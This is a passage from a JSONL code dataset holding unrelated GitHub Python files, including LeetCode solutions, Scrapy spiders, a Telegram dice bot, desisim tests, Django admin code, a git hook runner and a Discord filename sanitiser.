alist:\n val = abs(n) - 1\n alist[val] = -val\n\n for n in alist:\n if n > 0:\n res.append(n)\n\n return res\n\n\nclass FindAllNumbersTest(unittest.TestCase):\n def find_all_numbers_not_in_array_test(self):\n a = [4, 3, 2, 7, 8, 2, 3, 1]\n res = find_all_numbers_not_in_array(a)\n self.assertListEqual(res, [5, 6])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"aarboleda1/princeton_algos","sub_path":"practice/leetcode/find_all_numbers_in_disappeared_array.py","file_name":"find_all_numbers_in_disappeared_array.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"10790379025","text":"# Time: O(k*r*c + |E|log|V|) = O(k*r*c + (k*|V|)*log|V|)\n# = O(k*r*c + (k*(k*2^k))*log(k*2^k))\n# = O(k*r*c + (k*(k*2^k))*(logk + k*log2))\n# = O(k*r*c + (k*(k*2^k))*k)\n# = O(k*r*c + k^3*2^k)\n# Space: O(|V|) = O(k*2^k)\n\nimport collections\nimport heapq\n\n\nclass Solution(object):\n def shortestPathAllKeys(self, grid):\n \"\"\"\n :type grid: List[str]\n :rtype: int\n \"\"\"\n directions = [(0, -1), (0, 1), (-1, 0), (1, 0)]\n\n def bfs(grid, source, locations):\n r, c = locations[source]\n lookup = [[False]*(len(grid[0])) for _ in xrange(len(grid))]\n lookup[r][c] = True\n q = collections.deque([(r, c, 0)])\n dist = {}\n while q:\n r, c, d = q.popleft()\n if source != grid[r][c] != '.':\n dist[grid[r][c]] = d\n continue\n for direction in directions:\n cr, cc = r+direction[0], c+direction[1]\n if not ((0 <= cr < len(grid)) and\n (0 <= cc < len(grid[cr]))):\n continue\n if grid[cr][cc] != '#' and not lookup[cr][cc]:\n lookup[cr][cc] = True\n q.append((cr, cc, d+1))\n return dist\n\n locations = {place: (r, c)\n for r, row in enumerate(grid)\n for c, place in enumerate(row)\n if place not in '.#'}\n dists = {place: bfs(grid, place, locations) for place in locations}\n\n # Dijkstra's algorithm\n min_heap = [(0, '@', 0)]\n best = collections.defaultdict(lambda: collections.defaultdict(\n lambda: float(\"inf\")))\n best['@'][0] = 0\n target_state = 2**sum(place.islower() for place in locations)-1\n while min_heap:\n cur_d, place, state = heapq.heappop(min_heap)\n if best[place][state] < cur_d:\n continue\n if state == target_state:\n return cur_d\n for dest, d in dists[place].iteritems():\n next_state = state\n if dest.islower():\n next_state |= (1 << (ord(dest)-ord('a')))\n elif dest.isupper():\n if not (state & (1 << (ord(dest)-ord('A')))):\n continue\n if cur_d+d < best[dest][next_state]:\n best[dest][next_state] = cur_d+d\n heapq.heappush(min_heap, (cur_d+d, dest, next_state))\n return -1\n\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/shortest-path-to-get-all-keys.py","file_name":"shortest-path-to-get-all-keys.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"43490895969","text":"import scrapy\nimport sys\nfrom weixin.items import *\nfrom scrapy_splash import SplashRequest\nclass WeixinSpider(scrapy.Spider):\n name='weixin'\n start_urls=[]\n def start_requests(self):\n search_words=[\"广东发布\"]\n for search_word in search_words:\n print(search_word)\n url=\"https://www.sogou.com/web?query=\"+search_word+\"的微信公众号\"\n request=scrapy.Request(url,callback=self.parse,meta={'search_word':search_word})#meta传递额外参数\n yield request\n def parse(self,response):\n url=response.xpath('//div[@class=\"wx-table\"]//div[@class=\"wx-name\"]/span/a/@href').extract_first()\n search_word=response.meta['search_word']\n request=scrapy.Request(url,callback=self.parseList,meta={'search_word':search_word})#meta传递额外参数\n yield request\n\n def parseList(self,response):\n search_word=response.meta['search_word']\n urls=response.xpath('//div[@class=\"weui_media_bd\"]/h4[@class=\"weui_media_title\"]/@hrefs').extract() \n for url in urls:\n url=response.urljoin(url)\n request=scrapy.Request(url,callback=self.parseDetail,meta={'search_word':search_word})#meta传递额外参数\n yield request\n\n def parseDetail(self,response):\n search_word=response.meta['search_word']\n title=response.xpath('//div[@id=\"img-content\"]//h2[@id=\"activity-name\"]/text()').extract_first()\n publish_time=response.xpath('//em[@id=\"publish_time\"]/text()').extract_first()\n js_name=response.xpath('//div[@id=\"meta_content\"]//a[@id=\"js_name\"]/text()').extract_first()\n content=response.xpath('//div[@id=\"js_content\"]').extract_first()\n imgs=response.xpath('//div[@id=\"js_content\"]//img/@data-src').extract()\n \n title=title.replace('\\n','').strip(' ')\n js_name=js_name.replace('\\n','').strip(' ')\n publish_time=publish_time.strip('\\n').strip(' ')\n article=ArticleItem()\n article[\"search_word\"]=search_word\n article[\"title\"]=title\n article[\"js_name\"]=js_name\n article[\"publish_time\"]=publish_time\n article[\"content\"]=content\n article[\"image_urls\"]=imgs\n yield article\n\n \n","repo_name":"blueapplehe/weixinaritcle","sub_path":"weixin/spiders/weixinSpider.py","file_name":"weixinSpider.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38184252333","text":"# dices\nfrom asyncio import sleep\n\nfrom aiogram import types\n\nimport logging\n\nfrom bot.Banque import Banque\n\nlogging.getLogger(\"psycopg\").setLevel(logging.DEBUG)\n\nbank = Banque()\n\n\nasync def start_cubes(call: types.CallbackQuery):\n keyboard = types.InlineKeyboardMarkup()\n keyboard.add(types.InlineKeyboardButton(text=\"Throw\", callback_data=\"throw\"))\n keyboard.add(types.InlineKeyboardButton(text=\" ⬅ Menu ⬅\", callback_data=\"games\"))\n await call.message.edit_text(\"Throw Dices:\", reply_markup=keyboard)\n\n\nasync def throw_dice(call: types.CallbackQuery):\n user_id = call.from_user.id\n\n bank.start_transaction()\n bank.select_cash_for_update(user_id)\n\n cash = bank.show_cash(user_id)\n\n if cash < 300:\n\n keyboard = types.InlineKeyboardMarkup()\n keyboard.add(types.InlineKeyboardButton(text=\" ⬅ Menu ⬅\", callback_data=\"to_menu\"))\n await call.message.edit_text(\"There are not enough shekels on your account. \", reply_markup=keyboard)\n\n else:\n\n keyboard = types.InlineKeyboardMarkup()\n keyboard.add(types.InlineKeyboardButton(text=\" ⬅Menu⬅\", callback_data=\"games\"),\n types.InlineKeyboardButton(text=\"🔄Play Again🔄\", callback_data=\"dices\"))\n\n await call.message.edit_text(\"Throwing Dices:\")\n\n await call.message.answer(\"You:\")\n usr = await call.message.answer_dice()\n\n await call.message.answer(\"Bot:\")\n bott = await call.message.answer_dice()\n\n await sleep(3)\n\n if bott.dice.value > usr.dice.value:\n await call.message.answer(\"You lose;\\n\"\n \"300₪ was deducted from your account\", reply_markup=keyboard)\n\n bank.cash_withdrawal(300, user_id)\n\n elif bott.dice.value < usr.dice.value:\n await call.message.answer(\"You Win;\\n\"\n \"300₪ was credited to your balance\", reply_markup=keyboard)\n bank.replenishment(300, user_id)\n\n elif bott.dice.value == usr.dice.value:\n await call.message.answer(\"Draw\", reply_markup=keyboard)\n bank.commit_transaction()\n","repo_name":"WaldLumen/Geek_Casino","sub_path":"bot/games/dices/dices.py","file_name":"dices.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"37687030041","text":"import unittest, os\nfrom uuid import uuid1\nfrom shutil import rmtree\n\nimport numpy as np\nfrom astropy.io import fits\n\nimport desimodel.io\nimport desispec.io\n\nfrom desisim import io\nfrom desisim import obs\nfrom desisim import pixsim\nimport desisim.scripts.pixsim\n\nfrom desiutil.log import get_logger\nlog = get_logger()\n\ndesi_templates_available = 'DESI_ROOT' in os.environ\ndesi_root_available = 'DESI_ROOT' in os.environ\n\nclass TestPixsim(unittest.TestCase):\n #- Create test subdirectory\n @classmethod\n def setUpClass(cls):\n global desi_templates_available\n cls.testfile = 'test-{uuid}/test-{uuid}.fits'.format(uuid=uuid1())\n cls.testDir = os.path.join(os.environ['HOME'],'desi_test_io')\n cls.origEnv = dict(\n PIXPROD = None,\n DESI_SPECTRO_SIM = None,\n DESI_SPECTRO_DATA = None,\n )\n cls.testEnv = dict(\n PIXPROD = 'test',\n DESI_SPECTRO_SIM = os.path.join(cls.testDir,'spectro','sim'),\n DESI_SPECTRO_DATA = os.path.join(cls.testDir,'spectro','sim', 'test'),\n )\n for e in cls.origEnv:\n if e in os.environ:\n cls.origEnv[e] = os.environ[e]\n os.environ[e] = cls.testEnv[e]\n if desi_templates_available:\n cls.cosmics = (os.environ['DESI_ROOT'] +\n '/spectro/templates/cosmics/v0.2/cosmics-bias-r.fits')\n else:\n cls.cosmics = None\n\n #- to save memory while testing\n cls.ccdshape = (2000,2000)\n\n #- Cleanup test files if they exist\n @classmethod\n def tearDownClass(cls):\n if os.path.exists(cls.testfile):\n os.remove(cls.testfile)\n testpath = os.path.normpath(os.path.dirname(cls.testfile))\n if testpath != '.':\n os.removedirs(testpath)\n for e in cls.origEnv:\n if cls.origEnv[e] is None:\n del os.environ[e]\n else:\n os.environ[e] = cls.origEnv[e]\n if os.path.exists(cls.testDir):\n rmtree(cls.testDir)\n\n def setUp(self):\n self.night = '20150105'\n self.expid = 124\n\n def tearDown(self):\n rawfile = desispec.io.findfile('raw', self.night, self.expid)\n if os.path.exists(rawfile):\n os.remove(rawfile)\n fibermap = desispec.io.findfile('fibermap', self.night, self.expid)\n if os.path.exists(fibermap):\n os.remove(fibermap)\n simspecfile = io.findfile('simspec', self.night, self.expid)\n if os.path.exists(simspecfile):\n os.remove(simspecfile)\n for camera in ('b0', 'r0', 'z0'):\n pixfile = desispec.io.findfile('pix', self.night, self.expid, camera=camera)\n if os.path.exists(pixfile):\n os.remove(pixfile)\n simpixfile = io.findfile('simpix', self.night, self.expid, camera=camera)\n if os.path.exists(simpixfile):\n os.remove(simpixfile)\n\n\n @unittest.skipUnless(desi_root_available, '$DESI_ROOT not set')\n def test_pixsim(self):\n night = self.night\n expid = self.expid\n camera = 'r0'\n obs.new_exposure('arc', night=night, expid=expid, nspec=3)\n pixsim.simulate_frame(night, expid, camera, nspec=3,\n wavemin=6000, wavemax=6100, ccdshape=self.ccdshape)\n\n self.assertTrue(os.path.exists(io.findfile('simspec', night, expid)))\n simspec = io.read_simspec(io.findfile('simspec', night, expid))\n self.assertTrue(os.path.exists(io.findfile('simpix', night, expid, camera)))\n self.assertTrue(os.path.exists(io.findfile('pix', night, expid, camera)))\n\n @unittest.skipUnless(desi_templates_available, 'The DESI templates directory ($DESI_ROOT/spectro/templates) was not detected.')\n def test_pixsim_cosmics(self):\n night = self.night\n expid = self.expid\n camera = 'r0'\n obs.new_exposure('arc', night=night, expid=expid, nspec=3)\n pixsim.simulate_frame(night, expid, camera, nspec=3, cosmics=self.cosmics, ccdshape=self.ccdshape)\n\n self.assertTrue(os.path.exists(io.findfile('simspec', night, expid)))\n simspec = io.read_simspec(io.findfile('simspec', night, expid))\n self.assertTrue(os.path.exists(io.findfile('simpix', night, expid, camera)))\n self.assertTrue(os.path.exists(io.findfile('pix', night, expid, camera)))\n\n def test_simulate(self):\n import desispec.image\n night = self.night\n expid = self.expid\n camera = 'r0'\n nspec = 3\n obs.new_exposure('arc', night=night, expid=expid, nspec=nspec)\n simspec = io.read_simspec(io.findfile('simspec', night, expid))\n psf = desimodel.io.load_psf(camera[0])\n psf.npix_y, psf.npix_x = self.ccdshape\n\n image, rawpix, truepix = pixsim.simulate(camera, simspec, psf, nspec=nspec)\n\n self.assertTrue(isinstance(image, desispec.image.Image))\n self.assertTrue(isinstance(rawpix, np.ndarray))\n self.assertTrue(isinstance(truepix, np.ndarray))\n self.assertEqual(image.pix.shape, truepix.shape)\n self.assertEqual(image.pix.shape[0], rawpix.shape[0])\n self.assertLess(image.pix.shape[1], rawpix.shape[1]) #- raw has overscan\n\n #- Travis tests hang when writing coverage when both test_main* were\n #- called, though the tests work on other systems.\n #- Disabling multiprocessing also \"fixed\" this for unknown reasons.\n @unittest.skipIf(False, 'Skip test that is causing coverage tests to hang.')\n def test_main_defaults(self):\n night = self.night\n expid = self.expid\n camera = 'r0'\n nspec = 3\n ncpu = 3\n obs.new_exposure('arc', night=night, expid=expid, nspec=nspec)\n\n #- run pixsim\n opts = ['--night', night, '--expid', expid, '--nspec', nspec]\n if ncpu is not None:\n opts.extend( ['--ncpu', ncpu] )\n \n log.debug('testing pixsim.main({})'.format(opts))\n desisim.scripts.pixsim.main(opts)\n\n #- verify outputs\n simpixfile = io.findfile('simpix', night, expid)\n self.assertTrue(os.path.exists(simpixfile))\n rawfile = desispec.io.findfile('raw', night, expid)\n self.assertTrue(os.path.exists(rawfile))\n fx = fits.open(rawfile)\n\n self.assertTrue('B0' in fx)\n self.assertTrue('R0' in fx)\n self.assertTrue('Z0' in fx)\n fx.close()\n\n #- cleanup as we go\n os.remove(simpixfile)\n os.remove(rawfile)\n\n @unittest.skipIf(False, 'Skip test that is causing coverage tests to hang.')\n def test_main_override(self):\n night = self.night\n expid = self.expid\n camera = 'r0'\n nspec = 3\n ncpu = 3\n obs.new_exposure('arc', night=night, expid=expid, nspec=nspec)\n\n #- derive night from simspec input while overriding expid\n simspecfile = io.findfile('simspec', night, expid)\n altrawfile = desispec.io.findfile('raw', night, expid) + '.blat'\n opts = [\n '--simspec', simspecfile,\n '--expid', expid+1,\n '--rawfile', altrawfile,\n '--cameras', 'b0,r0',\n '--preproc',\n '--wavemin', 5000, '--wavemax', 7000.0,\n '--ccd_npix_x', 2000,\n ]\n if ncpu is not None:\n opts.extend( ['--ncpu', ncpu] )\n\n log.debug('testing pixsim.main({})'.format(opts))\n desisim.scripts.pixsim.main(opts)\n simpixfile = io.findfile('simpix', night, expid+1)\n self.assertTrue(os.path.exists(simpixfile))\n self.assertTrue(os.path.exists(altrawfile))\n fx = fits.open(altrawfile)\n self.assertTrue('B0' in fx)\n self.assertTrue('R0' in fx)\n self.assertTrue('Z0' not in fx)\n fx.close()\n\n #- cleanup as we go\n os.remove(simpixfile)\n os.remove(altrawfile)\n\n def test_project(self):\n psf = desimodel.io.load_psf('z')\n wave = np.arange(8000, 8010)\n phot = np.ones((2, len(wave)))\n specmin = 12\n args = psf, wave, phot, specmin\n xyrange, pix = pixsim._project(args)\n\n with self.assertRaises(ValueError):\n phot = np.ones((2,3,4))\n args = psf, wave, phot, specmin\n os.environ['UNITTEST_SILENT'] = 'TRUE'\n xyrange, pix = pixsim._project(args)\n del os.environ['UNITTEST_SILENT']\n\n def test_parse(self):\n night = self.night\n expid = self.expid\n opts = ['--psf', 'blat.fits', '--night', night, '--expid', expid]\n opts += ['--spectrographs', '0,3']\n args = desisim.scripts.pixsim.parse(opts)\n self.assertEqual(args.psf, 'blat.fits')\n self.assertEqual(args.night, night)\n self.assertEqual(args.expid, expid)\n self.assertEqual(args.spectrographs, [0,3])\n self.assertEqual(args.cameras, ['b0', 'b3', 'r0', 'r3', 'z0', 'z3'])\n\n with self.assertRaises(ValueError):\n desisim.scripts.pixsim.parse([])\n\n def test_expand_args(self):\n night = self.night\n expid = self.expid\n\n opts = ['--night', night, '--expid', expid, '--spectrographs', '0']\n args = desisim.scripts.pixsim.parse(opts)\n self.assertEqual(args.rawfile, desispec.io.findfile('raw', night, expid))\n self.assertEqual(args.cameras, ['b0','r0','z0'])\n\n opts = ['--night', night, '--expid', expid, '--spectrographs', '0,1',\n '--arms', 'b,z']\n args = desisim.scripts.pixsim.parse(opts)\n self.assertEqual(args.cameras, ['b0', 'b1', 'z0', 'z1'])\n\n opts = ['--cameras', 'b0', '--night', night, '--expid', expid]\n args = desisim.scripts.pixsim.parse(opts)\n self.assertEqual(args.cameras, ['b0'])\n\n opts = ['--cameras', 'b0,r1', '--night', night, '--expid', expid]\n args = desisim.scripts.pixsim.parse(opts)\n self.assertEqual(args.cameras, ['b0','r1'])\n\n#- This runs all test* functions in any TestCase class in this file\nif __name__ == '__main__':\n unittest.main()\n\ndef test_suite():\n \"\"\"Allows testing of only this module with the command::\n\n python setup.py test -m \n \"\"\"\n return unittest.defaultTestLoader.loadTestsFromName(__name__)\n","repo_name":"michaelJwilson/LBGCMB","sub_path":"desihub/desisim/py/desisim/test/test_pixsim.py","file_name":"test_pixsim.py","file_ext":"py","file_size_in_byte":10249,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"455329238","text":"# -*- coding: utf-8 -*-\n# 평균 계산 함수\ndef mean(x):\n return sum(x) / len(x)\n\n# 중간값 계산 함수\ndef median(x):\n n = len(x)\n x.sort()\n mid = n // 2\n if n % 2 == 1:\n return x[mid]\n else:\n low = mid - 1\n high = mid\n return (x[low] + x[high]) / 2\n","repo_name":"parksanghun/python_study","sub_path":"week_2/mod1.py","file_name":"mod1.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33819288794","text":"import json\n\nfrom django import forms\nfrom django.contrib.gis import admin\nfrom django.contrib.gis.geos import GEOSGeometry, Polygon\nfrom django.core.exceptions import RequestAborted, ValidationError\nfrom django.core.validators import FileExtensionValidator\n\nfrom .models import (\n LandClass,\n LandClassification,\n MiscTile,\n Project,\n ProjectAlgo,\n Scene,\n SegmentationEntry,\n SuperPixel,\n SuperPixelAlgo,\n)\nfrom .utils import check_geojson, check_raster, handle_tiles_upload\n\nadmin.site.register(Project)\nadmin.site.register(SuperPixelAlgo)\nadmin.site.register(ProjectAlgo)\nadmin.site.register(SuperPixel)\nadmin.site.register(LandClassification)\nadmin.site.register(SegmentationEntry)\n\n\n# =====================================================================================================================\n# Land class\n# =====================================================================================================================\nclass LandClassFormAdmin(forms.ModelForm):\n color = forms.CharField(label=\"Class color\", max_length=7, widget=forms.TextInput(attrs={\"type\": \"color\"}))\n\n\n@admin.register(LandClass)\nclass LandClassAdmin(admin.ModelAdmin):\n fields = [\"name\", \"description\", \"color\"]\n form = LandClassFormAdmin\n\n\n# =====================================================================================================================\n# Processing Scene with base tiles\n# =====================================================================================================================\nclass MiscTileInline(admin.TabularInline):\n model = MiscTile\n fields = [\"name\", \"description\", \"uuid\", \"tiles_path\", \"bbox\"]\n readonly_fields = [\"uuid\", \"tiles_path\", \"bbox\"]\n\n\nclass SceneFormAdmin(forms.ModelForm):\n json_file = forms.FileField(\n label=\"GeoJSON with superpixel polygons\",\n required=False,\n validators=[FileExtensionValidator([\"json\", \"geojson\"])],\n )\n algo_id = forms.ModelChoiceField(queryset=SuperPixelAlgo.objects.all(), required=False)\n image_file = forms.FileField(label=\"Spatial Raster Image\", required=False)\n\n def clean(self):\n cleaned_data = super().clean()\n # Check raster\n im_file = cleaned_data[\"image_file\"]\n # Check if it could be processed with gdal2tiles\n if \"image_file\" in self.changed_data:\n check_raster(im_file)\n # Check json if needed\n if not cleaned_data.get(\"json_file\") is None:\n json_file = cleaned_data[\"json_file\"]\n scene = self.instance\n scene_bbox = None\n if scene.bbox is not None:\n scene_bbox = scene.bbox\n check_geojson(json_file, scene_bbox, im_file)\n return cleaned_data\n\n def clean_algo_id(self):\n algo_id = self.cleaned_data[\"algo_id\"]\n if self.instance.pk is None: # Check if it is a new Scene object\n if algo_id is None:\n raise ValidationError(\"To create a new entry, please specify an algorythm\")\n # Algo id should be present if new SuperPixels provided\n if \"json_file\" in self.changed_data:\n if algo_id is None:\n raise ValidationError(\"Please specify an algorythm\")\n return self.cleaned_data[\"algo_id\"]\n\n def clean_image_file(self):\n # We want the user to provide image file on Scene creation. On the Scene change, the field is optional\n im_file = self.cleaned_data[\"image_file\"]\n if self.instance.pk is None: # Check if it is a new Scene object\n if im_file is None:\n raise ValidationError(\"To create a new entry, please provide the raster file\")\n return self.cleaned_data[\"image_file\"]\n\n def clean_json_file(self):\n # We need to check that the file is geojson, polygon, and could be read with GEOSGeometry\n im_file = self.cleaned_data[\"json_file\"]\n if self.instance.pk is None: # Check if it is a new Scene object\n if im_file is None:\n raise ValidationError(\"To create a new entry, please provide the json file\")\n return self.cleaned_data[\"json_file\"]\n\n class Meta:\n model = Scene\n fields = []\n\n\n@admin.register(Scene)\nclass SceneAdmin(admin.ModelAdmin):\n fields = [\"proj_id\", \"name\", \"description\", \"image_file\", \"json_file\", \"algo_id\", \"uuid\", \"tiles_path\", \"bbox\"]\n readonly_fields = [\"uuid\", \"tiles_path\", \"bbox\"]\n inlines = [MiscTileInline]\n form = SceneFormAdmin\n\n def save_model(self, request, obj, form, change):\n if not form.is_valid():\n # If something wrong, just let super method to handle that\n super().save_model(request, obj, form, change)\n\n # process image ===============================================================================================\n # Here we want to process image only if it is in changed form data (pass if a new file was not provided)\n if \"image_file\" in form.changed_data:\n # Generate uuid field if not present\n if obj.uuid is None:\n obj.gen_uuid()\n scene_uuid = obj.uuid\n else:\n scene_uuid = obj.uuid\n # Process image\n output_dir, bbox, srid, err = handle_tiles_upload(request.FILES[\"image_file\"], scene_uuid)\n # Check output for errors\n if err is not None:\n # Can not figure out how to handle this (form.add_error does not prevent for model saving)\n raise RequestAborted(err)\n\n obj.tiles_path = output_dir\n # Add bounding box to model obj, control for srid\n poly = Polygon.from_bbox(bbox)\n poly.srid = srid\n # Reproject bbox polygon to Scene model srid\n poly.transform(Scene.bbox.field.srid)\n obj.bbox = poly\n self.message_user(request, f\"Tiles for {obj} have been processed and saved to {output_dir}\")\n\n # Check if Superpixel Geojoson need to be processed\n if (not form.cleaned_data[\"json_file\"] is None) and (\"json_file\" in form.changed_data):\n # First check if our object has pk (or it is new, if so save current)\n if obj.pk is None:\n obj.save()\n change = True # So the super().save_model will treat subsequent additions as changes\n else: # The case of update (delete existent polys only if algo_id is the same)\n SuperPixel.objects.filter(scene_id=obj).filter(algo_id=form.cleaned_data.get(\"algo_id\")).delete()\n\n # Read geojson file (do not know why, but I was able to read it only via chunks)\n json_str = \"\"\n for chunk in request.FILES[\"json_file\"].chunks():\n json_str += chunk.decode(\"utf-8\")\n geojson_data = json.loads(json_str)\n\n # Loop over features and save them\n for feature in geojson_data.get(\"features\", []):\n feature_str = feature.get(\"geometry\")\n feature_str.update({\"crs\": geojson_data.get(\"crs\")})\n tmp_geom = GEOSGeometry(json.dumps(feature_str))\n tmp_geom.transform(obj.bbox.srid)\n # Save to SuperPixel model\n new_sp_obj = SuperPixel(scene_id=obj, algo_id=form.cleaned_data[\"algo_id\"], sp=tmp_geom)\n new_sp_obj.save()\n # Call super save\n super().save_model(request, obj, form, change)\n\n\n# =====================================================================================================================\n# Processing MiscTile model\n# =====================================================================================================================\nclass MiscTileFormAdmin(SceneFormAdmin):\n def clean_json_file(self):\n return None\n\n def clean_algo_id(self):\n return None\n\n class Meta:\n model = MiscTile\n fields = []\n\n\n@admin.register(MiscTile)\nclass MiscTileAdmin(SceneAdmin):\n fields = [\"scene_id\", \"name\", \"description\", \"image_file\", \"uuid\", \"tiles_path\", \"bbox\"]\n readonly_fields = [\"uuid\", \"tiles_path\", \"bbox\"]\n exclude = [\"json_file\", \"algo_id\"]\n inlines = []\n form = MiscTileFormAdmin\n","repo_name":"ivanstrel/django_spmc","sub_path":"django_spmc/spmc/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":8222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39718176415","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2022/4/17 20:23\n# @Author : shixin.liu\n# @File : intro_spider.py\nimport json\n\nfrom spiders.kwai.extractors.user_info_extractor import IntroUserInfoExtractor\nfrom spiders.kwai.tag_spider import KwaiTagSpider\n\n\nclass KwaiIntroSpider(KwaiTagSpider):\n def __init__(self):\n super().__init__()\n self.api = \"http://wxmini-api.uyouqu.com/rest/wd/wechatApp/search/user?__NS_sig3=6d7d390a8b450f5c9c303332b1f9f1d2aa541b482c2c2e2e21202339&__NS_sig3_origin=3sCt3iAAAAAAAAAAAAAAAwEQBv2b8ewCRWoKUiAAAABa1Uck2OzFjuwHqPh2n/qSj9QknvaoDgEN0sVDnubK8Q==\"\n self.user_extractor = IntroUserInfoExtractor()\n self.tag_list = [\n '短剧'\n ]\n\n def extract_user_list(self, rsp):\n data_json = json.loads(rsp.content)\n self.user_extractor.process(\n [video.get('user_id') for video in data_json.get('users')])\n\n\nif __name__ == '__main__':\n KwaiIntroSpider().extract()\n","repo_name":"yidatecSpider/crawl_user_info","sub_path":"spiders/kwai/intro_spider.py","file_name":"intro_spider.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"43796665577","text":"#!/usr/bin/env python\nfrom setuptools import setup\nimport os\n\n\n# Utility function to read README file\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\nsetup(name='django-logical-rules',\n version='2.0',\n description='A rule engine for Django apps.',\n author='Benjamin Stookey',\n author_email='it@aashe.org',\n url='https://github.com/AASHE/django-logical-rules',\n license='LICENSE',\n long_description=read(\"README.rst\"),\n packages=[\n 'logical_rules',\n 'logical_rules.templatetags',\n 'logical_rules.tests',\n 'logical_rules.tests.test_app',\n ],\n install_requires=[\n \"Django >= 1.9\",\n ],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Utilities'\n ],\n )\n","repo_name":"AASHE/django-logical-rules","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23666150168","text":"#!/usr/bin/env python\n\nimport os, sys\n\nimport importlib\nimportlib.reload(sys)\n\ndef run_hook(callback, old, new, ref):\n\tif old == \"0000000000000000000000000000000000000000\":\n\t\tsys.exit(0)\n\tret = os.system(\"git rev-parse -q --verify %s^2 >/dev/null\" % new)\n\tif ret == 0:\n\t\tmerge = True\n\telse:\n\t\tmerge = False\n\n\tsock = os.popen(\"git rev-list %s..%s\" % (old, new))\n\thashes = sock.readlines()\n\tsock.close()\n\thashes.reverse()\n\n\tfor i in hashes:\n\t\t# the second parameter is true, if this is a commit of a\n\t\t# merge (ie. if it's true, then the sendmail script\n\t\t# won't send it out, so that only the merge commit is\n\t\t# mailed after a merge)\n\t\tlast = i == hashes[-1]\n\t\tcallback(i.strip(), merge and not last, ref)\n\nif __name__ == \"__main__\":\n\tsys.path.append(\"/etc/git-hooks\")\n\tsys.path.append(\"/usr/share/git-hooks\")\n\tfrom config import config as myconfig\n\tfor line in sys.stdin.readlines():\n\t\t(old, new, ref) = line.split(' ')\n\t\tname = sys.argv[0].split('/')[1]\n\t\tif name == \"home\":\n\t\t\tname = \"post-receive\"\n\t\tfor i in myconfig.enabled_plugins[name]:\n\t\t\ts = \"%s.%s\" % (i, i)\n\t\t\tplugin = __import__(s)\n\t\t\tfor j in s.split(\".\")[1:]:\n\t\t\t\tplugin = getattr(plugin, j)\n\t\t\ttry:\n\t\t\t\trun_hook(plugin.callback, old, new, ref.strip())\n\t\t\texcept Exception as s:\n\t\t\t\t\tprint(\"Can't run plugin '%s' (%s)\" % (i, s))\n","repo_name":"frugalware/git-hooks","sub_path":"git-hooks.py","file_name":"git-hooks.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"7700209403","text":"import os\nimport re\n\nfrom utils import convert_discord_timestamp\n\n\ndef create_format_variables(message: dict, attachment: dict, index: int = 0) -> dict:\n variables = {\n \"filename\": os.path.splitext(attachment[\"filename\"])[0],\n \"ext\": os.path.splitext(attachment[\"filename\"])[1][1:],\n \"message_id\": message[\"id\"],\n \"id\": attachment[\"id\"],\n \"date\": convert_discord_timestamp(message[\"timestamp\"]),\n \"username\": message[\"author\"][\"username\"],\n \"user_id\": message[\"author\"][\"id\"],\n }\n return variables\n\n\ndef create_filepath(\n variables: dict,\n path: str,\n channel_format_template: str,\n dm_format_template: str,\n win_filenames: bool,\n restrict_filenames: bool,\n) -> str:\n format_template = (\n channel_format_template if \"server_id\" in variables else dm_format_template\n )\n components = []\n first = True\n while format_template:\n head, tail = os.path.split(format_template)\n if first:\n components.insert(\n 0,\n sanitize_filename(\n tail.format(**variables), win_filenames, restrict_filenames\n ),\n )\n first = False\n else:\n components.insert(\n 0,\n sanitize_foldername(\n tail.format(**variables), win_filenames, restrict_filenames\n ),\n )\n format_template = head\n components.insert(0, path)\n filepath = os.path.join(*components)\n return filepath\n\n\ndef sanitize_filename(string, windows_naming, restrict_filenames):\n string = re.sub(r\"[/]\", \"_\", string)\n string = re.sub(r\"[\\x00-\\x1f]\", \"\", string)\n if os.name == \"nt\" or windows_naming:\n string = re.sub(r\"[<>:\\\"/\\\\\\|\\?\\*]\", \"_\", string)\n if restrict_filenames:\n string = re.sub(r\"[^\\x21-\\x7f]\", \"_\", string)\n return string\n\n\ndef sanitize_foldername(string, windows_naming, restrict_filenames):\n string = sanitize_filename(string, windows_naming, restrict_filenames)\n # windows folder names can not end with spaces (\" \") or periods (\".\")\n if os.name == \"nt\" or windows_naming:\n string = string.strip(\" .\")\n return string\n","repo_name":"gageirwin-python-tools/Discord-Media-Downloader","sub_path":"discord_dl/filenaming.py","file_name":"filenaming.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"39440893987","text":"import os\nfrom os import path\nimport os.path\nimport sys\nfrom datetime import 